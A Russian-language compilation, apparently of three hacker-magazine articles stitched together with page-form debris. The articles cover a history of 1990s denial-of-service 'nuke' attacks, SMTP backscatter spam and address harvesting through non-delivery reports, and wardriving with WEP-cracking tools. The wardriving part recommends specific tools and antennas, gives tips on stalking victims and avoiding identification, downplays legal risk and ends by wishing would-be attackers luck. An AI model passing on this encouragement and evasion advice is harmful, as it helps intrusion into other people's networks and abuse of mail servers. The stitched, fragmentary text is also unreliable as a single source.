конецформыначалоформыСловом Nuke (ньюк) называют сегодня любую атаку на порты удаленных компьютеров, приводящую к краху операционной системы или разрыву интернет-соединения. Nuke не нарушает состояние файловой системы и не рушит “железо” компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так как могла работать только на UNIX системах с правами root. Идея nuke.c заключалась в том, что она отсылала неправильные (invalid) ICMP пакеты, и машина-хост теряла связь.
В январе 1997 появилась атака под названием Ping o’ Death, и 18 распространенных операционныхсистем оказались к ней весьма чувствительны. Ping o’ Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата – полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).
7 июня 1997 г. некто по имени “_eci” впервые опубликовал в Сети исходный код реализующей ее программы.
В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился “залатать дыры” своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.
В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.
В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением — программные заплатки, справлявшиеся с SSPing, оказались бессильны.
Январь 1998 года. Bonk и Bonik – модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в “группу риска” пользователи так и не удосужились эту “заплатку” установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.
Часто атаки комбинируются. Например, Land & IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing – подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)

Среди множества хитроумных трюков, применяемых спаме-
рами (и хакерами), NDR-атаки имеют особое место, пос-
кольку они основаны на фундаментальных спецификациях,
описывающих работу протокола SMTP (Simple Mail Transfer
Protocol — Простой протокол доставки почты). Пусть слово «простой»
не вводит тебя в заблуждение. SMTP — основной протокол, прямых
конкурентов у которого нет и, по-видимому, уже не будет (IMAP4 можно не
брать в расчет, это все-таки экзотика, а SMTP — «рабочая лошадка»).
RFC, SMTP, NDR
Свое название NDR-атаки получили по первым буквам выражения
Non-Delivery Report (отчет о недоставке почты). Всякий раз, когда SMTP-
сервер не может доставить письмо (скажем, по причине отсутствия
указанного адреса), он возвращает сообщение об ошибке с кодом 5xx,
которое может выглядеть, например, так: «550 5.7.1 Unable to relay for
kk@sendmail.ru», после чего разрывает TCP/IP-соединение. Однако
сервер может и принять сообщение, отложить его в очередь, оповещая
отправителя положительным кодом завершения операции (250).
Когда же в процессе обработки письма выяснится, что доставлять его
некому, сервер, как порядочный гражданин, возвратит письмо адресату
с объяснением причины невозможности доставки (здесь уместно
провести аналогию с «улиточной» почтой). Вот это самое уведомление
и называется Non-Delivery Report, или сокращенно NDR. Теоретически
формат отчета специфицирован в RFC-3464 (An Extensible Message
Format for Delivery Status Notifications — Открытый формат сообщений,
уведомляющих о статусе доставки), однако в реальной жизни он варьи-
руется в весьма широких пределах. Одни серверы помещают исходную
копию письма во вложение, а сам отчет (составленный, как правило, на
английском языке) кладут в основное тело сообщения. Другие же в целях
экономии трафика отправляют только отчет, добавляя к нему короткий
фрагмент исходного письма, включающий как минимум заголовок и не-
сколько первых строк (чтобы отправитель мог разобраться, какое именно
письмо «пострадало»).
В общем, уведомления о недоставке — стандартная и внешне вполне
безобидная фича, реализованная еще в незапамятные времена. Каза-
лось бы, ну чем она может быть полезна хакерам? Однако с ней связано
целых две атаки: использование SMTP-сервера в качестве proxy (bounce
message или backscatter-attack) и поиск валидных адресов (trial-n-error
attack).
Backscatter-attack
Термин backscatter перекочевал в хакерскую среду из физики, где он
означает отклонение волн от исходной траектории по тем или иным причинам. Применительно к SMTP-серверам backscatter
«символизирует» процесс отскока или отбивания посланного сообщения.
Такая атака также часто называется bounce message attack.
Один из крупнейших дефектов SMTP-протокола заключается в отсутствии
штатных механизмов проверки аутентичности обратного адреса отпра-
вителя сообщения. Сервер всецело полагается на адрес, оставленный
отправителем в поле «MAIL FROM:», не делая никаких попыток его про-
верки, а потому злоумышленник может запросто подставить любой адрес,
какой ему вздумается, и именно туда сервер возвратит сообщение при не-
возможности его доставки конечному получателю. Что делает злоумыш-
ленник? Он берет адрес жертвы, прописывает его в поле «MAIL FROM:», а
в поле «RCPT TO:» подставляет координаты заведомо несуществующего
получателя. Если сервер не является ретранслятором (также называемым
релеем — от английского relay), то есть берется за доставку корреспонден-
ции лишь своим локальным адресатам, то он с вероятностью, близкой к
единице, отобьет сообщение еще на стадии заполнения поля «RCPT TO:»
и атака не состоится. Впрочем, некоторые серверы, в частности MicrosoftExchange Server, имеют довольно дурную систему поиска имен и зачастую
принимают сообщения до проверки пользователя на существование.
Что же касается ретрансляторов (к которым де-факто принадлежат все
публичные серверы, такие, например, как mail.ru), то они вообще не в со-
стоянии определить существование нелокальных пользователей и потому
принимают все письма без разбора. Лишь потом, в случае невозможности
доставки, они посылают отправителю (или, точнее говоря, тому лицу, чей
адрес указан в поле «MAIL FROM:») соответствующее уведомление.
Ну и как это можно использовать для атаки? И тем более для спама? Ведьрассылка уведомлений по множественным адресам запрещена, и потому
атакующему для отправки N писем размером в K мегабайт придется
израсходовать N*K мегабайт своего трафика. А это ровно столько, сколько
тратится при так называемой директивной рассылке, когда атакую-
щий вообще не прибегает к услугам промежуточных SMTP-серверов, а
связывается с каждым получателем напрямую и кладет в его почтовый
ящик конверт со спамом (или с вирусом — неважно). Потому-то хакеры и
стремятся использовать открытые ретрансляторы, допускающие задание
в поле «RCPT TO:» множества адресатов. В идеале (если количество
адресов неограничено) атакующий тратит лишь K мегабайт собственного
трафика, остальные же почтовый сервер оплачивает из своего кармана.
Однако с каждым днем находить открытые ретрансляторы становится все
труднее и труднее. Практически все почтовые серверы устанавливают
жесткие лимиты на максимальное количество сообщений, передаваемых
в единицу времени, и либо вообще запрещают множественную рассылку,
либо соглашаются доставлять письмо ограниченному числу получателей
(как правило, не более шести).
Стоп! А зачем атакующему нужны открытые ретрансляторы, если широкие DSL-каналы сегодня не роскошь, а средство передвижения? К тому же
исходящий трафик обычно либо совсем бесплатный, либо тарифици-
руется по весьма льготным ценам. Сегодня каждый может позволить
себе арендовать канал, о котором вчера добрая половина провайдеров
не могла и мечтать! Кажется, что в сложившихся условиях директивная
рассылка должна стать основным орудием спамеров, но…
В том-то и дело, что при практической реализации атаки сразу же всплы-
вает множество «но». Большинство корпоративных (да и публичных)
серверов попросту не примет письмо неизвестно от кого. Поэтому как
минимум потребуется обзавестись доменным именем третьего уровня и
воздвигнуть собственный почтовый сервер (хотя бы чисто формальный).
А для этого уже желательно иметь статический IP, хотя доменное имя
третьего уровня можно бесплатно зарегистрировать и на динамическом.
В результате некоторых манипуляций мы добились того, что почтовые
серверы начинают принимать от нас корреспонденцию. Но стоит только
начать рассылать спам, как уже через несколько часов атака потухнет,
как бычок в писсуаре. Используя распределенные черные списки (они
же блэк-листы), почтовые серверы очень быстро заблокируют наш IP-
адрес (а то и всю подсеть). В случае статического адреса это еще ничего
(моя селедка, что хочу с ней, то и делаю), а вот блокировка динамичес-
кого IP (или всей подсети) создает огромные проблемы для провайдера,
который тут же отключает хакера. Вот так со всего маху и отключает. Пря-
мым ударом. В челюсть. Ведь попасть в черные списки намного проще,
чем выбраться оттуда, да и процедура «реабилитации» обычно далеко
не бесплатна. А количество провайдеров (даже в крупном городе) хоть и
велико, но все-таки ограничено.
Короче, директивная рассылка оправдывает себя только на ботнетах
— пишем червя, заражаем несколько десятков тысяч машин и ре-
транслируем письма их руками. Но ведь ботнет еще создать нужно! К
тому же, в отличие от спама (юридический статус которого до сих пор
не определен), это уже является довольно серьезным правонаруше-
нием, особенно если в число зараженных узлов попадут компьютеры
различных секретных ведомств. В таких случаях пощады ждать, как
правило, не приходится и приговор оказывается очень суров, а суди-
мость (пускай даже условная) — это все-таки судимость, существенно
ограничивающая гражданина в правах.
И тут на помощь спамерам приходят backscatter-атаки. Злоумышленник,
используя различные SMTP-серверы, рассылает корреспонденцию,
подставляя адрес получателя в поле «MAIL FROM:» и указывая заведомо
несуществующего пользователя в поле «RCPT TO:». Несмотря на то что
подлинный IP-адрес спамера остается в заголовке письма (помещаемо-
го сервером во вложение или в основное тело сообщения), существую-
щие фильтры не настолько интеллектуальны, чтобы достать его оттуда,
и потому заносят в черный список IP почтового сервера, рассылающего
уведомления о невозможности доставки сообщений. Поскольку таких
серверов очень много (данным условиям отвечает практически любой SMTP-сервер, даже не являющийся ретранслятором), они не кончатся
никогда, и на недостаток в них спамер навряд ли сможем пожаловаться.
А вот для владельцев самих атакованных серверов настанут мрачные
деньки, и им придется совершить нехилые телодвижения, доказывая,
что никакого спама они не рассылали!
Как защититься от подобных атак? Нет ничего проще! Достаточно
как следует покопаться в настройках сервера. Прежде всего, следует
включать в отчет о недоставке только фрагмент исходного сообще-
ния (заголовок плюс пара-тройка строк), что сделает его совершенно
бесполезным для спамеров, и они потеряют к нему всякий интерес. Если
же это невозможно (например, сервер не поддерживает таких настроек),
задействуй режим замедления SMTP-ответов, установив задержку в
несколько секунд для неавторизованных пользователей. Конечно, это
слегка замедлит производительность сервера, но… что поделаешь!
Между «скорострельностью» и безопасностью приходится выбирать
что-то одно.
Trial-n-error attack
Спамеры заинтересованы в отправке сообщений только на действу-
ющие адреса, и уведомления о недоставке тут приходятся как нельзя
кстати. В частности, ошибка типа «mailbox is full» говорит, что получа-
тель, скорее всего, забил на этот ящик и уже давно его не использует,
а потому он заполнен до предела. Но это мелочи. Главная проблема
спамеров — сбор адресов. Для их поиска разрабатываются хитроумные
программы-харвестеры (от английского harvester — «собиратель»),
блуждающие по просторам Сети и анализирующие web-странички, а
также проникающие на уязвимые узлы и сканирующие адресную книгу.
Однако пользователи не дураки. Свою основную мыльницу на форумах
уже давно никто не оставляет, а бесплатные ящики, создаваемые на
короткое время на серверах типа mail.ru, спамерам не очень интересны,
да и фильтры там стоят достаточно мощные.
Наибольший доход приносит рассылка по корпоративным адресам. Вот
только как эти самые адреса найти? А почему бы не воспользоваться
перебором по словарю? А что! Пользователи склонны выбирать короткие
и легко запоминающиеся адреса, как правило, состоящие из имени (с
добавленным к нему годом, когда такое имя уже кем-то занято), попу-
лярных слов типа mafia, hacker, supermen или инициалов в стиле kk, что
расшифровывается как Kris Kaspersky. Когда-то у меня был такой адрес
на sendmail’е. Спаму туда сыпалось огромное количество. Чуть меньше
доставалось n2k, зарегистрированному на том же сервере. Четырехсим-
вольный алиас kpnc чувствовал себя довольно уверенно — спаму туда
приходило относительно немного, но все-таки значительно больше,
чем на kris.kaspersky. Отсюда вывод: любые короткие имена (неваж-
но, словарные они или нет) легко находятся тривиальным подбором.
Атакующий просто отправляет большое количество писем, перебирая
различные буквенно-цифровые комбинации, и ловит NDR-уведомления от почтового сервера. Несуществующие адреса отметаются
сразу, а вот на остальные направляется стабильный поток
незапрошенной корреспонденции. Для экономии трафика
тело тестового письма обычно содержит минимум символов
и зачастую просто состоит из нескольких байт.
Исследование, проведенное автором этой статьи, показало,
что одно-, двух- и трехсимвольные комбинации представ-
лены на популярных почтовых серверах достаточно полно
и покрывают около двух десятков тысяч действующих
адресов. Причем, в отличие от адресов, почерпнутых из спа-
мерских баз (за которые еще платить надо), короткие имена
намного медленнее устаревают, поскольку их владельцам
жалко с ними расставаться. Даже если они выберут другое
короткое имя — ну и что с того? Оно также будет найдено
методом перебора.
Четырехсимвольные имена перебирать труднее, посколь-
ку из двух миллионов комбинаций реально используется
жалкая сотня тысяч или даже и того меньше. К тому же от-
правка двух миллионов писем — процедура нетривиальная,
привлекающая к себе внимание. Рассылка начнет давиться
фильтрами задолго до того, как спамер успеет пожать плоды
своих трудов. Пятисимвольные имена лобовым перебором
уже не находятся в принципе, точнее, находятся, конечно,
но… смысл? Разослать сто миллионов писем, чтобы собрать
ту же сотню тысяч адресов?
Другое мощное оружие — перебор по словарю. Кстати го-
воря, принятая система раздачи адресов в корпорациях (по
имени и/или фамилии сотрудников) этому только способс-
твует, поскольку, во-первых, существуют словари имен и фа-
милий. Во-вторых, даже если какая-то конкретная фамилия
в таком словаре отсутствует (например, Вуглускреб), то она
все равно содержит предсказуемые корни и подчиняется
правилам чередования гласных и согласных, что сущест-
венно ограничивает перебор.
Короткий лингвистический ликбез. Большинство русских (и
японских) имен содержит одинаковое количество попе-
ременно чередующихся гласных и согласных (Таня, Маня,
Мазепа, Иванов, Сидоров). Имена, включающие в себя
несколько подряд идущих гласных, также широко распро-
странены, но сочетаний подряд идущих согласных очень
и очень немного, причем в различных языках они разные.
Мы с трудом выговариваем сочетание th, в то время как
американцы приходят в ужас от слова «защищающиеся»
(попытайся записать его латиницей, и пусть тебя охватит
гордость за наш язык ).
Естественно, все, что известно лингвистам, известно и
хакерам (тем более что об этом можно прочесть в любом лин-
гвистическом учебнике, там же даны и таблицы распространенности различных сочетаний звуков и букв). Учитывая,
что гласных в латинском алфавите только шесть, нетрудно
подсчитать, сколько наберется «осмысленных» имен,
сгенерированных с учетом лингвистических особеннос-
тей (простейшие генераторы, которые легко найти в Сети,
исходят из предположения, что гласных и согласных должно
быть поровну). Более сложные программы, использующие
замороченные психофизические модели, как правило,
распространяются за деньги, однако и те и другие дают
поразительный результат и эффективно находят даже девя-
тисимвольные имена, разумеется, без учета словаря.
Как вариант — можно использовать словарь и программу-
модификатор, переставляющую буквы местами, записыва-
ющую «O» как ноль, «l» как единицу, набирающую русские
имена латинскими буквами с учетом их расположения на
клавиатуре: Марина — Vfhbyf и т.д.
Короче говоря, даже если нигде не светить свое мыло,
настырные спамеры его все равно найдут (исключение
составляют длинные — свыше пяти-шести символов
— имена, состоящие из одних согласных букв, цифр и спец-
символов). Можно ли защититься от подобных атак? На
уровне почтового сервера — можно. Достаточно генериро-
вать сообщение о недоставке в ответ на все подозритель-
ные сообщения и даже на все сообщения с неизвестным
адресатом (то есть таким адресатом, которому получатель
сообщения ранее не отправлял никакой корреспонден-
ции). Практика показывает, что честные пользователи
сразу (или через некоторое время) повторяют попытку
отправки вновь, в то время как спамеры тут же заносят
такой адрес в список несуществующих. Кстати говоря,
поскольку спамеры анализируют уведомления о недостав-
ке не вручную, а с помощью программ, выдирающих из тела
письма код ошибки, то имеет смысл добавить в уведомле-
ние русский текст, предлагающий пользователю отправить
сообщение еще раз, чтобы тот зря не нервничал, полагая,
что ошибся адресом.

конецформыначалоформыРазберемся, что такое вардрайвинг (wardriving) и с чем его необходимо употреблять
Немногие знают, что такое вардрайвинг, хотя он существует давно. В отличие от привычных способов взлома, научиться вардрайвингу намного проще, так как для него не требуются специфические знания дизассемблирования, необходимые при взломе программ. Тем не менее, профессиональных вардрайверов единицы, и те шифруются. В этом номере мы приоткроем занавес и расскажем о вардрайвинге.
Что такое вардрайвинг
Вардрайвингом (англ. wardriving – дословно “военное вождение” или “война на колесах”) называется охота на точки доступа Wi-Fi (никаких зверей при этом убивать не нужно), на те самые точки доступа, которые предназначены для беспроводного подключения к локальной сети или интернету. Цель вардрайвера – найти чужую точку и захватить контроль над ней. Реально вардрайвинг зародился в 50-х годах прошлого века (он еще назывался охотой на лис) и представлял собой вполне легальный вид радиоспорта с четко установленными правилами и международными состязаниями. На пересеченной местности в укромной норе закладывался радиопередатчик, периодически издающий сигналы (лиса), а спортсмены, вооруженные приемниками с направленной антенной, должны были найти ее. С началом перестройки все это умерло. Теперь никому не интересно корпеть над паяльником, изобретая все новые и новые технические решения, и скакать, как козел . Современное поколение предпочитает охотиться на добычу попроще, используя полностью готовое оборудование и программное обеспечение.
Разработчики vs. Вардрайверы
Стандартный 64-битный ключ шифрования легко взламывается лобовым перебором. Учитывая, что фактическая длина секретного ключа составляет всего лишь 40 бит, в среднем достаточно перебрать 549.755.813.888 комбинаций. При скорости перебора в сотню миллионов ключей в секунду (посильная скорость для современных процессоров) атака займет час-полтора. Злоумышленнику достаточно перехватить один зашифрованный пакет, а затем терзать его до тех пор, пока контрольная сумма расшифрованного пакета не совпадет с ICV. Стучаться на точку доступа при этом совершенно не обязательно. А с учетом существования четырех секретных ключей, продолжительность полного цикла перебора несколько возрастает, однако не столь радикально.
Для предотвращения лобовой атаки производители беспроводного оборудования увеличили длину секретной части ключа до 104 бит, попутно породив проблему обратной совместимости. Добавь сюда 24 бита вектора инициализации и получишь так называемое 128-битное шифрование. Подобрать 104-битный ключ вслепую уже нереально: при прежней скорости перебора в среднем на это уходит 2.817.001.333.840.509.768.000 часов, или 3.215.754.947.306.518 веков, что значительно превышает не только оставшееся время существования Солнца, но и Вселенной в целом . Однако хакерам удалось найти более короткий путь, сократив время взлома в миллиарды раз.
В августе 2001 года три криптоаналитика (Scott Fluhrer, Itsik Mantin и Adi Shamir) опубликовали свою подрывную статью “Слабые места алгоритма распределения ключей RC4″ (”Weaknesses in the Key Scheduling Algorithm of RC4″), которая мгновенно стала знаменитой и определила название всего семейства атак этого типа, – FMS-attack (по первым буквам фамилий первооткрывателей Fluhrer-Mantin-Shamir). Они обнаружили существование крупных классов слабых (weak) ключей, в которых крошечная часть битов ключа оказывает значительное влияние на зашифрованные данные. Поскольку в формировании эффективного ключа участвует вектор инициализации, генерируемый произвольным образом, в общий шифропоток неизбежно попадает некоторое количество слабых ключей. Собрав достаточный объем трафика, злоумышленник отбирает пакеты, зашифрованные слабыми ключами (такие пакеты называются слабыми или интересными). Каждый слабый пакет с 5% степенью вероятности восстанавливает один байт секретного ключа, поэтому общее количество пакетов, которые атакующий должен собрать для реализации атаки, в первую очередь зависит от степени его везучести. В среднем для взлома требуется порядка шести миллионов зашифрованных пакетов. В зависимости от интенсивности трафика и пропускной способности канала, на это уходит от нескольких часов до нескольких дней, хотя в некоторых случаях атака успешно заканчивается уже через несколько минут. И это при 104-битном ключе! Так работает AirSnort и многие другие хакерские утилиты, которые любой злоумышленник может свободно скачать из Сети.
Если обмен данными между легальными клиентами и точкой доступа незначителен или практически отсутствует, злоумышленник может заставить жертву генерировать большое количество трафика, даже не зная секретного ключа. Достаточно просто перехватить правильный пакет и, не расшифровывая, ретранслировать его вновь. ARP-запрос вызовет неизбежный ARP-ответ. Отличить APR-запросы от всех остальных пакетов очень просто: frame.pkt_len == 68 и wlan.da == FF:FF:FF:FF:FF:FF. Обычно для передачи запросов используется отдельная WLAN-карта (при этом расстояние между антеннами приемной и передающей карт должно составлять, по меньшей мере, 15 сантиметров), хотя некоторые карты ухитряются перехватывать трафик и одновременно с этим бомбардировать жертву пакетами.
Хакеры лаборатории H1kari of Dasb0den Labs усилили FMS-алгоритм, сократив количество необходимых пакетов с шести миллионов до 500 тысяч. А в некоторых случаях 40/104-битный ключ взламывается всего с тремя тысячами пакетов, что позволяет атаковать даже домашние точки доступа, не напрягая их избыточным трафиком. Усиленный алгоритм атаки реализован в утилите dwepcrack, входящей в состав пакета BSD-airtools, а также в другом хакерском инструментарии.
Разработчики оборудования отреагировали вполне адекватным образом, изменив алгоритм генерации векторов инициализации так, чтобы слабые ключи уже не возникали. Даже dwepcrack’у требовалось перехватить свыше 10 миллионов пакетов, но даже в этом случае успешная расшифровка ключа не гарантирована. Устройства, выпущенные после 2002-2003 года, скорее всего, уже защищены от FMS-атаки, а более древние модели решают эту проблему обновлением прошивки (правда, не все производители выпустили такое обновление). Но даже сегодня, в середине 2005 года, в эксплуатации находится множество уязвимых устройств, особенно на периферии, куда уходят все нереализованные складские запасы. Тем не менее, ситуация сложилась так, что хакерам пришлось искать новые пути для атак.
В августе 2004 года хакер по имени KoreK продемонстрировал исходный код нового криптоанализатора, взламывающего даже сильные векторы инициализации. Для восстановления 40-битного ключа ему требовалось всего 200 000 пакетов с уникальными векторами инициализации, а для 104-битного – 500 тысяч. Количество пакетов с уникальными векторами в среднем составляет порядка 95% от общего количества зашифрованных пакетов, так что для восстановления ключа атакующему потребуется совсем немного времени. Данный алгоритм реализован в chopper’е, aircrack’е, WepLab’е и других хакерских утилитах.
В новом оборудовании, построенном по технологии WPA – Wi-Fi Protected Access (защищенный Wi-Fi-доступ), вновь была усилена защищенность беспроводных устройств. На место WEP пришел TKIP (Temporal Key Integrity Protocol – протокол краткосрочной целостности ключей), генерирующий динамические ключи, сменяющие друг друга с небольшим интервалом времени. Для совместимости с существующим оборудованием TKIP использует тот же самый потоковый алгоритм шифрования, что и WEP, – RC4, но в каждый зашифрованный пакет теперь укладывается специальный 8-байтный код целостности сообщения, рассчитанный по алгоритму Michael и предотвращающий ретрансляцию подложных пакетов. Процедура аутентификации осуществляется по протоколу EAP (Extensible Authentication Protocol – расширенный протокол аутентификации), который использует либо а) RADIUS-сервер (Remote Authentication Dial-In User Service – служба дистанционной аутентификации пользователей по коммутируемым линиям); либо б) предустановленный общий ключ PSK (pre-shared key). В процессе аутентификации сервер генерирует парный мастер-ключ (PMK – Pairwise Master Key) и передает его клиенту. Несмотря на относительную новизну этой технологии, в комплект airckrack’a уже входит специальный модуль WZCOOK, отображающий PMK-ключ . Для несанкционированного подключения к точке доступа, защищенной технологией WPA, этого оказалось вполне достаточно. Впрочем, атакующий модуль недостаточно отлажен и в некоторых случаях не срабатывает.
Стандарт IEEE 802.11i описывает более продвинутую систему безопасности (известна под именем WPA2), основанную на криптоалгоритме AES. Готовых утилит для ее взлома в открытом виде пока не наблюдается, так что с этой технологией можно чувствовать себя в безопасности. По крайней мере, какое-то время она продержится . Обладателям устаревшего оборудования настоятельно рекомендуем пробить VPN-тоннели (Virtual Private Network – виртуальная частная сеть), задействовать SSL-шифрование или подключить любые другие способы защиты, изначально ориентированные на небезопасные каналы передачи данных.
Вардрайвинг – не совсем взлом
Вардрайвинг – это не обязательно “взлом”. Часто атакующий ограничивается тем, что находит открытую точку доступа, но не подключается к ней. Во-вторых, вардрайвинг ни внешне, ни внутренне не похож на дизассемблирование защищенных программ или написание вирусов. Это делает занятие вардрайвингом непохожим на другие способы взлома в привычном для нас понимании. В вардрайвинге намного больше романтики, чем, например, в сексе с отладчиком . С другой стороны, если ломать программы умеют единицы, то стать классным вардрайвером сможет практически любой.
Кто занимается вардрайвингом
Вардрайвингом занимаются в основном романтики , хотя отмечены единичные случаи хищения кредитных карт и другой конфиденциальной информации через WLAN. У вардрайвера вряд ли может возникнуть много амбиций, скорее, азарт и сладострастное чувство, что ты кого-то поимел. Подавляющее большинство атакующих действуют без злого умысла, воспринимая это как шалость или интеллектуальную игру. Но встречаются и настоящие охотники за чужим трафиком, из которого можно извлечь различную конфиденциальную информацию (пароли на почтовые ящики, номера кредитных карт и т.д.), и просто желающие подключиться к интернету за чужой счет.
Кто-то вардрайвит за деньги, но таких немного. Даже в Штатах точки доступа еще не распространены настолько, чтобы на их взломе было возможно добывать пропитание. Тех, кто конструирует уникальное железо, – единицы. Тех, кто пишет софт, – десятки. Сотни или даже тысячи пользуются готовым железом/софтом, а еще больше тех, кто просто интересуется этим занятиям, но не рискует вардрайвить на практике. Мы относимся к последним .
Использование готового снаряжения не требует теоретической подготовки, выходящей за рамки навыков владения мышью, зато физическая подготовка весьма желательна, так как вычисленных вардрайверов в нашей стране практически никогда не передают в прокуратуру – только “братков” к ним посылают.
Источник информации для вардрайверов – форумы, в которых можно найти и свежие хакерские программы, и хитрые приемы взлома, и все остальное. Эрудиции продвинутого пользователя будет вполне достаточно. Но для написания атакующего софта требуется глубокая теоретическая подготовка и интуиция. Над проблемой взлома корпят не только программисты, но и криптографы, причем последние обычно работают на легальной основе и публикуют свои научные труды, которые уже переваривают программисты.
Инструменты вардрайвера
Если говорить об оснащении вардрайвера, то, как правило, это карманный компьютер или ноутбук, снабженный WLAN-картой на основе чипсета Prism (его поддерживает подавляющее большинство программ), внешней антенной (обычно направленного типа) и соответствующим ПО. Добротная антенна направленного типа, снабженная усилителем мощности, уверенно держит связь на расстояниях до 1,5-2 км, а в некоторых случаях и больше.
Такую антенну вместе с усилителем можно купить совершенно легально. Их выпускает Hyper Technology, Broadcast Warehouse, “Радиал” и многие другие компании. Среди хакеров большой популярностью пользуется направленная антенна HG2415Y типа Radome-Enclosed (компания HyperLink Technology), которую можно заказать по интернету. Рассчитанная на стационарный монтаж, она, тем не менее, неплохо чувствует себя на фотографическом штативе или даже на обыкновенном ружейном прикладе, превращающем ее в мобильный инструмент для слежения за подвижными жертвами. Параболические антенны действуют на расстояниях, ограниченные, фактически, лишь горизонтом видимости, но они катастрофически немобильны, а для хакера самое главное – вовремя смотаться с места взлома. В общем, для вардрайвинга подходит практически любая антенна направленного типа на 2,4 ГГц (она же антенна стандарта IEEE 802.11b/802.11g или WLAN).
Из программного обеспечения понадобятся: сканер, снифер и взломщик паролей. Их можно найти практически под любую платформу. На Pocket PC обычно используется связка MiniStumbler/Sniffer Portable/Airscanner Mobile. MiniStumbler обнаруживает присутствие сети в данной точке, измеряет интенсивность сигнала, отображает SSID/MAC-адреса и определяет, задействовано WEP-шифрование или нет. Sniffer Portable и Airscanner Mobile грабят все пролетающие мимо пакеты и записывают их в файл, который затем переносится на ноутбук или настольный ПК и пропускается через взломщик паролей (процессорных ресурсов карманного компьютера для взлома паролей за разумное время пока недостаточно).
Распространенный снифер под Linux и BSD – Kismet, изначально ориентированный на исследовательские цели. Он поддерживает массу оборудования и беспроводных протоколов, удобен в использовании и к тому же абсолютно бесплатен. Перехватывает сетевой трафик, показывает SSID- и MAC-адреса, подсчитывает количество пакетов со слабыми векторами инициализации и т.д. Из взломщиков паролей в последнее время реально работают только aircrack и WepLap, причем первый работает значительно лучше.
Под Windows перехват беспроводного трафика реализуется гораздо сложнее, и кроме снифера потребуются модифицированные версии драйверов для WLAN-карты. Из коммерческих сниферов можно порекомендовать Airopeek, из некоммерческих – утилиту airdump (входит в состав aircrack, портирована под Windows). Еще можно использовать Sniffer Pro.
На Mac’ах весь хакерский инструментарий собран в одном флаконе – утилита KisMAC, настолько простая, что ей сможет пользоваться даже ребенок. Здесь есть и сетевой сканер, и снифер, и парольный переборщик (brute force), и криптоанализатор слабых векторов инициализации. Предусмотрена даже такая мелочь, как планировщик, позволяющий осуществлять атаки по расписанию .
Как охотиться
Можно, например, просканировать периметр своего обитания, поднявшись на балкон и вооружившись параболической антенной на 2,4 ГГц. Представь: сидишь себе в засаде, пьешь пиво, сканируешь периметр и ждешь, когда жертва попадет в силки. Через неделю, максимум через две, оперативная обстановка будет изучена, и что тогда? А тогда карманный компьютер или ноутбук – и вперед на колеса. Если колес нет, вполне подойдет троллейбус или трамвай. Они и внимания меньше привлекают, и за дорогой следить не надо.
На Западе и у нас
Конечно, западные и азиатские тусовки более многочисленны и продвинуты. У нас, несмотря на мягкий климат никем не соблюдаемых законов, вардрайвинг распространяется довольно сдержанно. Отчасти это объясняется апатичностью отечественной публики, отчасти ориентацией не на процесс, а на результат.
Каждый оценивает крутость вардрайвера по-своему. Настоящие профи шифруются и молчат. Этап самоутверждения у них остался позади, зато иметь проблемы с законом или “братками” им неохота. Они посещают тематические форумы, но практически не оставляют сообщений. В самых жарких дискуссиях, как правило, участвуют новички, соревнующиеся, “кто больше взломает”.
А что с безнаказанностью? Да у нас вообще высокий уровень преступности. Суды переполнены намного более важными делами, чем какой-то там вардрайвинг, а сотрудники милиции заняты вопросами собственного пропитания. Но даже честный следователь не может начать дело, пока не будет заявления от истца и каких-нибудь доказательств. В практическом плане для истца это означает постоянные повестки в суд, длительные разбирательства по поводу наличия всех сертификатов, комплекса охранных мер и т.д. На Западе такие шалости не проходят и уже есть реальный пример того, как засудили вардрайвера.
Сомнительная мобильность
Может показаться, что вардрайвинг безопаснее банального стационарного взлома, так как сам вардрайвер становится мобильнее и его сложнее вычислить физически. Напротив. Стационарный взлом через цепочку надежных прокси или сотовый телефон, купленный с рук, а после звездного часа закатанный в асфальт, вполне безопасен, и хакера обычно вяжут уже на продаже ворованной информации. Вардрайвер привлекает больше внимания. Вокруг респектабельных зданий полно камер, фиксирующих номера машин, и простых охранников хватает, а у них на эти вещи глаз наметан. Так что мобильность мобильностью, а питать иллюзий на этот счет не стоит.
Вардрайвинг – охота на точки доступа Wi-Fi и получение контроля над ними.
Вардрайвингом занимаются скорее для спортивного интереса, чем для получения ценной информации. Иногда и просто ради халявного доступа в интернет.
Пока еще не научились ломать стандарт IEEE 802.11i. Но долго ли он продержится?
Для вардрайвинга, по сути, нужны только ноутбук, направленная антенна и специальный софт.
Направленные антенны продаются совершенно легально.
Вряд ли тебя посадят за вардрайверство, но могут серьезно “наехать”.
That’s all, Folks! ^_^ Если кто-то будет этим заниматься, то удачи вам всем!:))
